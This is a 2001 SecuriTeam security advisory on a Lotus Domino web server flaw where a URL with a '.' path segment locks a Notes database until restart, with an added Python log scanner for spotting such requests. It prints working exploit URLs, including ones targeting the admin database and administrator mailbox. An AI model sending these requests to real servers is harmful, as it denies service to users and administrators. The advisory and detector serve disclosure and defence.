[NEWS] Lotus Domino Web Server DoS Vulnerability (DB Lock)

From: support@securiteam.com
Date: 12/11/01


From: support@securiteam.com
To: list@securiteam.com
Date: Tue, 11 Dec 2001 14:36:20 +0100 (CET)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

  Lotus Domino Web Server DoS Vulnerability (DB Lock)
------------------------------------------------------------------------

SUMMARY

With a specially crafted URL, an anonymous user can lock access to
databases on the Lotus Notes server. As a result, no Lotus Notes user
(not even the administrators and the servers) can access the targeted
databases until the Lotus Domino server is restarted.

DETAILS

Vulnerable systems:
Lotus Domino version 5.0.5
Lotus Domino version 5.0

Exploit:
General syntax:
http://server/directory/./base_name.nsf

For example, to lock the WEBADMIN.NSF database:
http://server/./webadmin.nsf

To lock the administrator mailbox:
http://server/mail/./administrator.nsf
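
For administrators who want to check whether this request form has reached their server, the following is an added example (not part of the original advisory) that scans access-log lines for a "." path segment in front of a .nsf name and reports which clients requested which database. It assumes the log is in Common Log Format and records the request line as received; the function names and sample lines are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Common Log Format: host ident user [time] "METHOD target PROTO" status size
CLF = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+)[^"]*" (\d{3}) \S+')

def dot_segment_nsf(target):
    """Return the database path if the request path has a '.' segment in
    front of a .nsf file name (the form shown in the advisory), else None."""
    path = urlsplit(target).path              # drops any ?OpenDatabase-style query
    segments = path.split("/")
    if not segments[-1].lower().endswith(".nsf"):
        return None                           # not a request for a Notes database
    if "." not in segments[:-1]:
        return None                           # ordinary database URL
    # Report the database with the '.' segments removed, lower-cased for grouping.
    return "/".join(s for s in segments if s != ".").lower()

def scan(lines):
    """Map each targeted database to the set of client addresses that requested it."""
    hits = defaultdict(set)
    for line in lines:
        m = CLF.match(line)
        if not m:
            continue                          # skip lines that are not CLF
        client, _method, target, _status = m.groups()
        db = dot_segment_nsf(target)
        if db:
            hits[db].add(client)
    return dict(hits)

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE = [
    '192.0.2.10 - - [11/Dec/2001:14:00:01 +0100] "GET /mail/./administrator.nsf HTTP/1.0" 200 512',
    '192.0.2.10 - - [11/Dec/2001:14:00:02 +0100] "GET /./webadmin.nsf HTTP/1.0" 200 512',
    '198.51.100.7 - - [11/Dec/2001:14:00:05 +0100] "GET /mail/jdoe.nsf?OpenDatabase HTTP/1.0" 200 2048',
    '198.51.100.7 - - [11/Dec/2001:14:00:09 +0100] "GET /help/v1.2/index.html HTTP/1.0" 200 900',
    '203.0.113.4 - - [11/Dec/2001:14:01:00 +0100] "GET /MAIL/./Administrator.NSF HTTP/1.0" 200 512',
]

if __name__ == "__main__":
    for db, clients in sorted(scan(SAMPLE).items()):
        print(db, sorted(clients))
```

A hit on a database that users later report as inaccessible ties the lock to a source address and a time in the log.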

Vendor status:
Lotus was contacted on 11/23/01, but no response was received.

ADDITIONAL INFORMATION

The information has been provided by
Sebastien EXT-MICHAUD <Sebastien.EXT-MICHAUD@atofina.com>.
